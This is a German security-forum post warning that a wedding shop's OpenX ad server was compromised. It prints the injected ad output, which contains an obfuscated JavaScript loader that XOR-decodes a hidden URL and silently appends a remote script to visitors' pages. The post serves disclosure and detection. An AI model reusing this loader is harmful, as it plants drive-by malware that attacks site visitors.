Achtung: Weddix.de : Mal wieder ein neuartiger "Javascript-Verschleierer"

zahni · 07.10.2014, 11:53

Hi,

ich bin neu hier. Warum? Avira hat sein Board zu gemacht

In der Fa. nervt sein ein paar Tagen unser IDS von Symantec wg. eines Browser Exploits.

Ein Wenig Forschung ergab, dass der OpenX Server auf httx://www. weddix. de/hochzeitsshop/hochzeitskarten/shop-hochzeitskarten-einladungskarten-danksagungskarten.html

Gehackt wurde. Leider zum wiederholten Mal. Provider und Betreiber sind leider merkbefreit, trotz mehrfacher Information. Heute sogar per Telefon.

Das Problem: Die Javascript-Verschleierung ist wohl recht kreativ und wird von keinem Scanner erkannt:

Code:

ATTFilter

var OA_output = new Array(); 
OA_output['59'] = '';
OA_output['59'] += "<"+"script>var xLGXZkx = \"60d3f856128f68beac15f6f1f9daec7d16f06a73deb934dd155b3d4ed1bf3984f2b9bd96f740dbf4ced41c0206ba0a770e007c3e382631b1101e74592e06736534b8eb675ae1a0be24\";var PJkHGCh = \"08a78c2628a047d8cd76d8949ea39c097f910410b1cd40b27b285527a3cb4aaa91d6d0b99535af80aba6336768ce6f057e72154d5d551ed87d731d3e5c67070c5bd6c40e2a928ed457\";var oSlaGFi = \"\";var w=0x00;for(var i=0;i<"+"(xLGXZkx.length/2);i++){oSlaGFi += String.fromCharCode(parseInt((xLGXZkx[w]+xLGXZkx[w+1]),16)^parseInt((PJkHGCh[w]+PJkHGCh[w+1]),16));w += 2;}var miners = document.getElementsByTagName(\"he\" + \"ad\").item(0);var war = document.createElement(\"sc\" + \"ri\" + \"pt\");war.setAttribute(\"t\" + \"ype\", \"te\" + \"xt/java\" + \"scr\" + \"ipt\");war.setAttribute(\"a\" + \"sync\", \"t\" + \"rue\");war.setAttribute(\"s\" + \"rc\", oSlaGFi);if(document.cookie.indexOf(\"rigid\")==-1){miners.appendChild(war);document.cookie = \"rigid=slowdown; path=/; expires=Thu, 09 Oct 14 22:31:56 +0400;\";}<"+"/script><"+"a href=\'hxxp://adserver.weddix.de/www/delivery/ck.php?oaparams=2__bannerid=175__zoneid=59__OXLCA=1__cb=ec30b2780b__oadest=http%3A%2F%2Fwww.weddix.de%2Fhochzeitsshop%2Fshop-personalisiertes.html\' target=\'_blank\'><"+"img src=\'hxxp://adserver.weddix.de/www/images/163ffdafaed28387897c1783be3aa05a.gif\' width=\'300\' height=\'250\' alt=\'Personalisiertes - das pers�nliche Extra\' title=\'Personalisiertes - das pers�nliche Extra\' border=\'0\' /><"+"/a><"+"div id=\'beacon_ec30b2780b\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'hxxp://adserver.weddix.de/www/delivery/lg.php?bannerid=175&amp;campaignid=55&amp;zoneid=59&amp;OXLIA=1&amp;loc=http%3A%2F%2Fwww.weddix.de%2Fhochzeitsshop%2F%3F_%24ja%3Dtsid%3A58600%7Ccgn%3A51370668361%7Ckw%3Aweddix%26gclid%3DCK3xw4LVmMECFY_MtAodmicA2g&amp;referer=http%3A%2F%2Fwww.google.de%2Faclk%3Fsa%3Dl%26ai%3DCQMPQXuAyVOy6AuWYzAOk54KoA5n0ursD2Y68w78BvfrFzgIIABABII2WphgoAlDu7Jnp_P____8BYJWKtoLEB6ABpJ7B_wPIAQGqBCFP0EK_zdkXtfNv-SM5z8K7CmhcwYtChMNu9LDUKM0hJ1KABZBOgAfE4T6QBwOoB6a-Gw%26sig%3DAOD64_1Tz4tt39w_mfvD0VKfoNjm3DK0Kg%26rct%3Dj%26q%3D%26ved%3D0CCMQ0Qw%26adurl%3Dhttp%3A%2F%2Ft23.intelliad.de%2Findex.php%253Fredirect%253Dhttp%25253A%25252F%25252Fwww.weddix.de%25252Fhochzeitsshop%25252F%25253F_%252524ja%25253Dtsid%25253A58600%25257Ccgn%25253A51370668361%25257Ckw%25253Aweddix%2526cl%253D5383938303236323131303%2526bm%253D1%2526bmcl%253D4303037313536343737303%2526cp%253D110855761%2526ag%253D11696626081%2526sbm%253D1%2526ad%253D51370668361%2526pl%253D%2526bk%253Dweddix%2526admt%253Dp&amp;cb=ec30b2780b\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";

Wer mag, kann sich ja mal darum "kümmern"

PS: Die Analyse auf JSUNPACK:

hxxp://jsunpack. jeek. org/?report=d56ba3462d530a0a10b9de62f9766865559a16d1

Achtung: Weddix.de : Mal wieder ein neuartiger "Javascript-Verschleierer"

Diskussionsforum: Achtung: Weddix.de : Mal wieder ein neuartiger "Javascript-Verschleierer"

Achtung: Weddix.de : Mal wieder ein neuartiger "Javascript-Verschleierer"

Ähnliche Themen: Achtung: Weddix.de : Mal wieder ein neuartiger "Javascript-Verschleierer"